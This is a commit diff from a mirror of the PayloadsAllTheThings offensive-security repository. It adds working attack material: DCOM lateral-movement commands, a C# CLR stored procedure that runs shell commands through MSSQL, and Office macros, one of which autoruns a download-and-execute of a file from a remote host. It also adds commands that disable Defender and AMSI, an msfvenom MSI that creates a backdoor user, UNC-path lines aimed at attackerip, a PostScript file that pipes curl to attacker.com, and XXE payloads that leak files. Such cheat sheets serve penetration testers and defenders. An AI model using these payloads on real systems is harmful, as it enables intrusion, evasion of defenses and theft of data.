mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-04 18:40:41 +00:00
DCOM exploitation and MSSQL CLR
This commit is contained in:
parent
bd2166027e
commit
f6b9d63bf8
10 changed files with 296 additions and 10 deletions
|
@ -66,6 +66,10 @@
|
|||
- [ReadLAPSPassword](#readlapspassword)
|
||||
- [ReadGMSAPassword](#readgmsapassword)
|
||||
- [ForceChangePassword](#forcechangepassword)
|
||||
- [DCOM Exploitation](#dcom-exploitation)
|
||||
- [DCOM via MMC Application Class](#dcom-via-mmc-application-class)
|
||||
- [DCOM via Excel](#dcom-via-excel)
|
||||
- [DCOM via ShellExecute](#dcom-via-shellexecute)
|
||||
- [Trust relationship between domains](#trust-relationship-between-domains)
|
||||
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
||||
- [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket)
|
||||
|
@ -199,9 +203,9 @@ use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
|
|||
.\SharpHound.exe -c all -d active.htb -SearchForest
|
||||
.\SharpHound.exe --EncryptZip --ZipFilename export.zip
|
||||
.\SharpHound.exe -c all,GPOLocalGroup
|
||||
.\SharpHound.exe -c all --LDAPUser <UserName> --LDAPPass <Password> --JSONFolder <PathToFile>
|
||||
.\SharpHound.exe -c all -d active.htb --LDAPUser <UserName> --LDAPPass <Password> --domaincontroller 10.10.10.100
|
||||
|
||||
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
|
||||
.\SharpHound.exe -c all -d active.htb --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100
|
||||
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
|
||||
|
||||
# or run the collector on the machine using Powershell
|
||||
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
|
||||
|
@ -1091,6 +1095,17 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
|
|||
PS > Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime
|
||||
```
|
||||
|
||||
* LAPSToolkit - https://github.com/leoloobeek/LAPSToolkit
|
||||
```powershell
|
||||
$ Get-LAPSComputers
|
||||
ComputerName Password Expiration
|
||||
------------ -------- ----------
|
||||
exmaple.domain.local dbZu7;vGaI)Y6w1L 02/21/2021 22:29:18
|
||||
|
||||
$ Find-LAPSDelegatedGroups
|
||||
$ Find-AdmPwdExtendedRights
|
||||
```
|
||||
|
||||
* ldapsearch
|
||||
```powershell
|
||||
ldapsearch -x -h -D "@" -w -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
|
||||
|
@ -1712,6 +1727,58 @@ Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword
|
|||
```
|
||||
|
||||
|
||||
### DCOM Exploitation
|
||||
|
||||
> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer
|
||||
|
||||
|
||||
#### DCOM via MMC Application Class
|
||||
|
||||
This COM object (MMC20.Application) allows you to script components of MMC snap-in operations. there is a method named **"ExecuteShellCommand"** under **Document.ActiveView**.
|
||||
|
||||
```ps1
|
||||
PS C:\> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1"))
|
||||
PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,7)
|
||||
PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",$null,"-enc DFDFSFSFSFSFSFSFSDFSFSF < Empire encoded string > ","7")
|
||||
|
||||
# Weaponized example with MSBuild
|
||||
PS C:\> [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",$null,"\\10.10.10.2\webdav\build.xml","7")
|
||||
```
|
||||
|
||||
Invoke-MMC20RCE : https://raw.githubusercontent.com/n0tty/powershellery/master/Invoke-MMC20RCE.ps1
|
||||
|
||||
#### DCOM via Excel
|
||||
|
||||
```ps1
|
||||
# Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM
|
||||
Invoke-Excel4DCOM64.ps1 https://gist.github.com/Philts/85d0f2f0a1cc901d40bbb5b44eb3b4c9
|
||||
Invoke-ExShellcode.ps1 https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a
|
||||
|
||||
# Using Excel DDE
|
||||
PS C:\> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
|
||||
PS C:\> $excel.DisplayAlerts = $false
|
||||
PS C:\> $excel.DDEInitiate("cmd", "/c calc.exe")
|
||||
```
|
||||
|
||||
#### DCOM via ShellExecute
|
||||
|
||||
```ps1
|
||||
$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.10.10.1")
|
||||
$obj = [System.Activator]::CreateInstance($com)
|
||||
$item = $obj.Item()
|
||||
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
|
||||
```
|
||||
|
||||
#### DCOM via ShellBrowserWindow
|
||||
|
||||
:warning: Windows 10 only, the object doesn't exists in Windows 7
|
||||
|
||||
```ps1
|
||||
$com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"10.10.10.1")
|
||||
$obj = [System.Activator]::CreateInstance($com)
|
||||
$obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
|
||||
```
|
||||
|
||||
### Trust relationship between domains
|
||||
|
||||
* One-way
|
||||
|
@ -2403,3 +2470,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
|||
* [CVE-2020-17049: Kerberos Bronze Bit Attack – Theory - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/)
|
||||
* [Kerberos Bronze Bit Attack (CVE-2020-17049) Scenarios to Potentially Compromise Active Directory](https://www.hub.trimarcsecurity.com/post/leveraging-the-kerberos-bronze-bit-attack-cve-2020-17049-scenarios-to-compromise-active-directory)
|
||||
* [GPO Abuse: "You can't see me" - Huy Kha - July 19, 2019](https://pentestmag.com/gpo-abuse-you-cant-see-me/)
|
||||
* [Lateral movement via dcom: round 2 - enigma0x3 - January 23, 2017](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/)
|
||||
* [New lateral movement techniques abuse DCOM technology - Philip Tsukerman - Jan 25, 2018](https://www.cybereason.com/blog/dcom-lateral-movement-techniques)
|
|
@ -27,6 +27,7 @@
|
|||
* [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures)
|
||||
* [CLR Assemblies](#clr-assemblies)
|
||||
* [Execute commands using CLR assembly](#execute-commands-using-clr-assembly)
|
||||
* [Manually creating a CLR DLL and importing it](#manually-creating-a-clr-dll-and-importing-it)
|
||||
* [OLE Automation](#ole-automation)
|
||||
* [Execute commands using OLE automation procedures](#execute-commands-using-ole-automation-procedures)
|
||||
* [Agent Jobs](#agent-jobs)
|
||||
|
@ -217,6 +218,11 @@ Get-SQLStoredProcedureXP -Instance "<DBSERVERNAME\DBInstance>" -Verbose
|
|||
|
||||
## CLR Assemblies
|
||||
|
||||
Prerequisites:
|
||||
* sysadmin privileges
|
||||
* CREATE ASSEMBLY permission (or)
|
||||
* ALTER ASSEMBLY permission (or)
|
||||
|
||||
### Execute commands using CLR assembly
|
||||
|
||||
```ps1
|
||||
|
@ -225,6 +231,93 @@ or
|
|||
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64>" -Verbose
|
||||
```
|
||||
|
||||
### Manually creating a CLR DLL and importing it
|
||||
|
||||
Create a C# DLL file with the following content, with the command : `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs`
|
||||
|
||||
```csharp
|
||||
using System;
|
||||
using System.Data;
|
||||
using System.Data.SqlClient;
|
||||
using System.Data.SqlTypes;
|
||||
using Microsoft.SqlServer.Server;
|
||||
using System.IO;
|
||||
using System.Diagnostics;
|
||||
using System.Text;
|
||||
|
||||
public partial class StoredProcedures
|
||||
{
|
||||
[Microsoft.SqlServer.Server.SqlProcedure]
|
||||
public static void cmd_exec (SqlString execCommand)
|
||||
{
|
||||
Process proc = new Process();
|
||||
proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";
|
||||
proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);
|
||||
proc.StartInfo.UseShellExecute = false;
|
||||
proc.StartInfo.RedirectStandardOutput = true;
|
||||
proc.Start();
|
||||
|
||||
// Create the record and specify the metadata for the columns.
|
||||
SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));
|
||||
|
||||
// Mark the beginning of the result set.
|
||||
SqlContext.Pipe.SendResultsStart(record);
|
||||
|
||||
// Set values for each column in the row
|
||||
record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());
|
||||
|
||||
// Send the row back to the client.
|
||||
SqlContext.Pipe.SendResultsRow(record);
|
||||
|
||||
// Mark the end of the result set.
|
||||
SqlContext.Pipe.SendResultsEnd();
|
||||
|
||||
proc.WaitForExit();
|
||||
proc.Close();
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
Then follow these instructions:
|
||||
|
||||
1. Enable `show advanced options` on the server
|
||||
```sql
|
||||
sp_configure 'show advanced options',1;
|
||||
RECONFIGURE
|
||||
GO
|
||||
```
|
||||
2. Enable CLR on the server
|
||||
```sql
|
||||
sp_configure 'clr enabled',1
|
||||
RECONFIGURE
|
||||
GO
|
||||
```
|
||||
3. Import the assembly
|
||||
```sql
|
||||
CREATE ASSEMBLY my_assembly
|
||||
FROM 'c:\temp\cmd_exec.dll'
|
||||
WITH PERMISSION_SET = UNSAFE;
|
||||
```
|
||||
4. Link the assembly to a stored procedure
|
||||
```sql
|
||||
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];
|
||||
GO
|
||||
```
|
||||
5. Execute and clean
|
||||
```sql
|
||||
cmd_exec "whoami"
|
||||
DROP PROCEDURE cmd_exec
|
||||
DROP ASSEMBLY my_assembly
|
||||
```
|
||||
|
||||
**CREATE ASSEMBLY** will also accept an hexadecimal string representation of a CLR DLL
|
||||
|
||||
```sql
|
||||
CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM
|
||||
0x4D5A90000300000004000000F[TRUNCATED]
|
||||
WITH PERMISSION_SET = UNSAFE
|
||||
GO
|
||||
```
|
||||
|
||||
## OLE Automation
|
||||
|
||||
|
@ -436,4 +529,5 @@ SELECT SYSTEM_USER
|
|||
## References
|
||||
|
||||
* [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3)
|
||||
* [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet)
|
||||
* [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet)
|
||||
* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/)
|
|
@ -13,11 +13,12 @@
|
|||
* [DOCM - C# converted to Office VBA macro](#docm---c-converted-to-office-vba-macro)
|
||||
* [DOCM - VBA Wscript](#docm---vba-wscript)
|
||||
* [DOCM - VBA Shell Execute Comment](#docm---vba-shell-execute-comment)
|
||||
* [DOCM - VBA Spawning via svchost.exe using Scheduled Task](#docm---vba-spawning-via-svchost-exe-using-scheduled-task)
|
||||
* [DCOM - WMI COM functions (VBA AMSI)](#docm---wmi-com-functions-vba-amsi)
|
||||
* [DOCM - VBA Spawning via svchost.exe using Scheduled Task](#docm---vba-spawning-via-svchostexe-using-scheduled-task)
|
||||
* [DCOM - WMI COM functions (VBA AMSI)](#docm---wmi-com-functions)
|
||||
* [DOCM - winmgmts](#docm---winmgmts)
|
||||
* [DOCM - Macro Pack - Macro and DDE](#dcom---macro-pack---macro-and-dde)
|
||||
* [DOCM - Macro Pack - Macro and DDE](#docmxlm---macro-pack---macro-and-dde)
|
||||
* [DOCM - CACTUSTORCH VBA Module](#docm---cactustorch-vba-module)
|
||||
* [DOCM - MMG with Custom DL + Exec](#docm---mmg-with-custom-dl--exec)
|
||||
* [VBA Obfuscation](#vba-obfuscation)
|
||||
* [VBA Purging](#vba-purging)
|
||||
* [OfficePurge](#officepurge)
|
||||
|
@ -221,6 +222,12 @@ Sub Auto_Open()
|
|||
End Sub
|
||||
```
|
||||
|
||||
```vb
|
||||
CreateObject("WScript.Shell").Run "calc.exe"
|
||||
CreateObject("WScript.Shell").Exec "notepad.exe"
|
||||
```
|
||||
|
||||
|
||||
## DOCM - VBA Shell Execute Comment
|
||||
|
||||
Set your command payload inside the **Comment** metadata of the document.
|
||||
|
@ -271,6 +278,8 @@ Rem powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadst
|
|||
|
||||
## DOCM - WMI COM functions
|
||||
|
||||
Basic WMI exec (detected by Defender) : `r = GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create("calc.exe", null, null, intProcessID)`
|
||||
|
||||
```ps1
|
||||
Sub wmi_exec()
|
||||
strComputer = "."
|
||||
|
@ -307,6 +316,11 @@ Sub AutoOpen()
|
|||
End Sub
|
||||
```
|
||||
|
||||
```ps1
|
||||
Const ShellWindows = "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
|
||||
Set SW = GetObject("new:" & ShellWindows).Item()
|
||||
SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe", "C:\Windows\System32", Null, 0
|
||||
```
|
||||
|
||||
## DOCM/XLM - Macro Pack - Macro and DDE
|
||||
|
||||
|
@ -416,7 +430,7 @@ python MMG.py configs/generic-cmd.json malicious.vba
|
|||
}
|
||||
```
|
||||
|
||||
```ps1
|
||||
```vb
|
||||
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
|
||||
|
||||
Public Function DownloadFileA(ByVal URL As String, ByVal DownloadPath As String) As Boolean
|
||||
|
@ -443,6 +457,18 @@ Sub Auto_Open()
|
|||
End Sub
|
||||
```
|
||||
|
||||
## DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro
|
||||
|
||||
Go to **Developer tab** on ribbon `-> Insert -> More Controls -> Microsoft InkPicture Control`
|
||||
|
||||
```vb
|
||||
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
|
||||
Run = Shell("cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://<host>/file.exe','file.exe');Start-Process 'file.exe'", vbNormalFocus)
|
||||
End Sub
|
||||
```
|
||||
|
||||
|
||||
|
||||
## VBA Obfuscation
|
||||
|
||||
```ps1
|
||||
|
@ -619,4 +645,5 @@ E
|
|||
* [WordAMSIBypass - rmdavy](https://github.com/rmdavy/WordAmsiBypass)
|
||||
* [Dechaining macros and evading EDR - Noora Hyvärinen](https://blog.f-secure.com/dechaining-macros-and-evading-edr/)
|
||||
* [Executing macros from docx with remote - RedXORBlueJuly 18, 2018](http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html)
|
||||
* [One thousand and one ways to copy your shellcode to memory (VBA Macros) - X-C3LL - Feb 18, 2021](https://adepts.of0x.cc/alternatives-copy-shellcode/)
|
||||
* [One thousand and one ways to copy your shellcode to memory (VBA Macros) - X-C3LL - Feb 18, 2021](https://adepts.of0x.cc/alternatives-copy-shellcode/)
|
||||
* [Running macros via ActiveX controls - greyhathacker - September 29, 2016](http://www.greyhathacker.net/?p=948)
|
|
@ -17,6 +17,7 @@
|
|||
* [Use Powershell Version 2 - No AMSI Support there](#Using-PowerShell-version-2)
|
||||
* [Nishang all in one](#Nishang-all-in-one)
|
||||
* [Adam Chesters Patch](#Adam-Chester-Patch)
|
||||
* [AMSI.fail](#amsifail)
|
||||
|
||||
## Which Endpoint Protection is Using AMSI
|
||||
|
||||
|
@ -735,6 +736,11 @@ Add-Type -TypeDefinition $Winpatch -Language CSharp
|
|||
[patch]::it()
|
||||
```
|
||||
|
||||
## AMSI.fail
|
||||
|
||||
> AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures. - https://amsi.fail/
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [S3cur3Th1sSh1t - Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/blob/master/README.md)
|
|
@ -254,6 +254,8 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
|||
|
||||
## Antivirus & Detections
|
||||
|
||||
Enumerate antivirus on a box with `WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName`
|
||||
|
||||
### Windows Defender
|
||||
|
||||
```powershell
|
||||
|
@ -263,6 +265,13 @@ PS C:\> Get-MpComputerStatus
|
|||
# disable Real Time Monitoring
|
||||
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
|
||||
PS C:\> Set-MpPreference -DisableIOAVProtection $true
|
||||
|
||||
# disable AMSI (set to 0 to enable)
|
||||
PS C:\> Set-MpPreference -DisableScriptScanning 1
|
||||
|
||||
# exclude a folder
|
||||
PS C:\> Add-MpPreference -ExclusionPath "C:\Temp"
|
||||
PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
|
||||
```
|
||||
|
||||
### AppLocker Enumeration
|
||||
|
@ -777,16 +786,23 @@ Check if these registry values are set to "1".
|
|||
```bat
|
||||
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||
$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||
|
||||
$ Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer
|
||||
$ Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer
|
||||
```
|
||||
|
||||
Then create an MSI package and install it.
|
||||
|
||||
```powershell
|
||||
$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
|
||||
$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi-nouac -o evil.msi
|
||||
$ msiexec /quiet /qn /i C:\evil.msi
|
||||
```
|
||||
|
||||
Technique also available in Metasploit : `exploit/windows/local/always_install_elevated`
|
||||
Technique also available in :
|
||||
* Metasploit : `exploit/windows/local/always_install_elevated`
|
||||
* PowerUp.ps1 : `Get-RegistryAlwaysInstallElevated`, `Write-UserAddMSI`
|
||||
|
||||
|
||||
## EoP - Insecure GUI apps
|
||||
|
||||
|
|
|
@ -202,6 +202,7 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca
|
|||
## Psexec.py / Smbexec.py / Wmiexec.py
|
||||
|
||||
From [Impacket](https://github.com/SecureAuthCorp/impacket) (:warning: renamed to impacket-xxx in Kali)
|
||||
:warning: `get` / `put` for wmiexec, psexec, smbexec, and dcomexec are changing to `lget` and `lput`.
|
||||
|
||||
```powershell
|
||||
root@payload$ git clone https://github.com/CoreSecurity/impacket.git
|
||||
|
|
|
@ -208,6 +208,21 @@ MSSQL supports stacked queries so we can create a variable pointing to our IP ad
|
|||
1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';--
|
||||
```
|
||||
|
||||
```sql
|
||||
xp_dirtree '\\attackerip\file'
|
||||
xp_fileexist '\\attackerip\file'
|
||||
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
|
||||
BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'
|
||||
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
|
||||
RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
|
||||
RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
|
||||
RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
|
||||
RESTORE LABELONLY FROM DISK = '\\attackerip\file'
|
||||
RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
|
||||
RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
|
||||
```
|
||||
|
||||
|
||||
## MSSQL Make user DBA (DB admin)
|
||||
|
||||
```sql
|
||||
|
@ -252,3 +267,4 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
|
|||
* [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
|
||||
* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
|
||||
* [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT)
|
||||
* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)
|
|
@ -30,6 +30,7 @@ Attempting to manipulate SQL queries may have goals including:
|
|||
* [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
|
||||
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
|
||||
* [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
|
||||
* [SQLmap without SQL injection](#sqlmap-without-sql-injection)
|
||||
* [Authentication bypass](#authentication-bypass)
|
||||
* [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1)
|
||||
* [Polyglot injection](#polyglot-injection-multicontext)
|
||||
|
@ -200,6 +201,7 @@ sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/
|
|||
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
|
||||
```
|
||||
|
||||
|
||||
### General tamper option and tamper's list
|
||||
|
||||
```powershell
|
||||
|
@ -267,6 +269,14 @@ tamper=name_of_the_tamper
|
|||
|versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
|
||||
|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
|
||||
|
||||
### SQLmap without SQL injection
|
||||
|
||||
You can use SQLmap to access a database via its port instead of a URL.
|
||||
|
||||
```ps1
|
||||
sqlmap.py -d "mysql://user:pass@ip/database" --dump-all
|
||||
```
|
||||
|
||||
## Authentication bypass
|
||||
|
||||
```sql
|
||||
|
|
|
@ -0,0 +1,6 @@
|
|||
%!PS
|
||||
userdict /setpagedevice undef
|
||||
legal
|
||||
{ null restore } stopped { pop } if
|
||||
legal
|
||||
mark /OutputFile (%pipe%curl http://attacker.com/?a=callback) currentdevice putdeviceprops
|
|
@ -26,6 +26,7 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
|||
- [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013)
|
||||
- [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter)
|
||||
- [XXE OOB with Apache Karaf](#xxe-oob-with-apache-karaf)
|
||||
- [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents)
|
||||
- [XXE in exotic files](#xxe-in-exotic-files)
|
||||
- [XXE inside SVG](#xxe-inside-svg)
|
||||
- [XXE inside SOAP](#xxe-inside-soap)
|
||||
|
@ -250,6 +251,9 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
|
|||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Exploiting blind XXE to exfiltrate data out-of-band
|
||||
|
||||
Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.
|
||||
|
@ -372,6 +376,43 @@ Assuming payloads such as the previous return a verbose error. You can start poi
|
|||
[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md)
|
||||
|
||||
|
||||
|
||||
## Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents
|
||||
|
||||
From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
|
||||
|
||||
### Disclose local file
|
||||
|
||||
```xml
|
||||
<!DOCTYPE doc [
|
||||
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
|
||||
<!ENTITY % SuperClass '>
|
||||
<!ENTITY % file SYSTEM "file://D:\webserv2\services\web.config">
|
||||
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file://t/#%file;'>">
|
||||
%eval;
|
||||
%error;
|
||||
<!ENTITY test "test"'
|
||||
>
|
||||
%local_dtd;
|
||||
]><xxx>cacat</xxx>
|
||||
```
|
||||
|
||||
### Disclose HTTP Response:
|
||||
|
||||
```xml
|
||||
<!DOCTYPE doc [
|
||||
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
|
||||
<!ENTITY % SuperClass '>
|
||||
<!ENTITY % file SYSTEM "https://erp.company.com">
|
||||
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file://test/#%file;'>">
|
||||
%eval;
|
||||
%error;
|
||||
<!ENTITY test "test"'
|
||||
>
|
||||
%local_dtd;
|
||||
]><xxx>cacat</xxx>
|
||||
```
|
||||
|
||||
## XXE in exotic files
|
||||
|
||||
### XXE inside SVG
|
||||
|
|
Loading…
Reference in a new issue